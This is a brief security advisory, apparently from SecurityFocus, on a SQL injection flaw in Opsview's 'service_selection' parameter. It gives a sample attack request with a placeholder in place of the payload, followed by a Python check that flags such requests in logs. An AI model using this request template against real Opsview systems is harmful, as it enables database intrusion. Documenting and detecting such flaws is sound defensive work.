Opsview 'service_selection' Parameter SQL Injection Vulnerability

An attacker can exploit this issue using a web browser.

The following example data is available:

POST /status/service/acknowledge HTTP/1.1
Content-Length: 118
Content-Type: application/x-www-form-urlencoded
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U) [en]

comment=&from=http%3a%2f%2f10.20.30.68%2fstatus%2fhostgroup&notify=1&service_selection=%24%7dsql injection goes here%7d&submit=Submit
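
A detection-side check for the request above, as an added example that is not part of the original advisory or of Opsview's code: it form-decodes POST bodies sent to /status/service/acknowledge and flags service_selection values that fall outside an allow-list. The allow-list pattern and the benign sample request are assumptions; the advisory does not document what legitimate values look like.

```python
import re
from urllib.parse import parse_qs

TARGET_PATH = "/status/service/acknowledge"
PARAM = "service_selection"
# Assumption: legitimate values use only these characters; the page does not
# document the real format, so tune this to what your Opsview UI submits.
ALLOWED = re.compile(r"[A-Za-z0-9_.,:;|\- ]*")

def check_request(raw, allowed=ALLOWED):
    """Return findings for one raw HTTP request; an empty list means nothing flagged."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2 or request_line[0] != "POST":
        return []
    if request_line[1].split("?", 1)[0] != TARGET_PATH:
        return []
    # keep_blank_values so an empty parameter is still seen
    fields = parse_qs(body.strip(), keep_blank_values=True)
    values = fields.get(PARAM, [])
    findings = []
    if len(values) > 1:
        findings.append(f"{PARAM}: sent {len(values)} times")
    for value in values:
        if not allowed.fullmatch(value):
            bad = "".join(sorted({c for c in value if not allowed.fullmatch(c)}))
            findings.append(f"{PARAM}: unexpected characters {bad!r}")
    return findings

# Request as shown on the page (headers trimmed to the ones the check reads past).
PAGE_REQUEST = (
    "POST /status/service/acknowledge HTTP/1.1\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "\n"
    "comment=&from=http%3a%2f%2f10.20.30.68%2fstatus%2fhostgroup&notify=1"
    "&service_selection=%24%7dsql injection goes here%7d&submit=Submit\n"
)
# Constructed benign request; the value "12,34" is a made-up placeholder.
BENIGN_REQUEST = (
    "POST /status/service/acknowledge HTTP/1.1\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "\n"
    "comment=ok&notify=1&service_selection=12,34&submit=Submit\n"
)

if __name__ == "__main__":
    for name, req in (("page", PAGE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(name, check_request(req))
```

A check like this only surfaces suspicious requests in proxy or WAF logs; the fix belongs in the application, which should bind the parameter in a parameterized query.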


 

Copyright 2010, SecurityFocus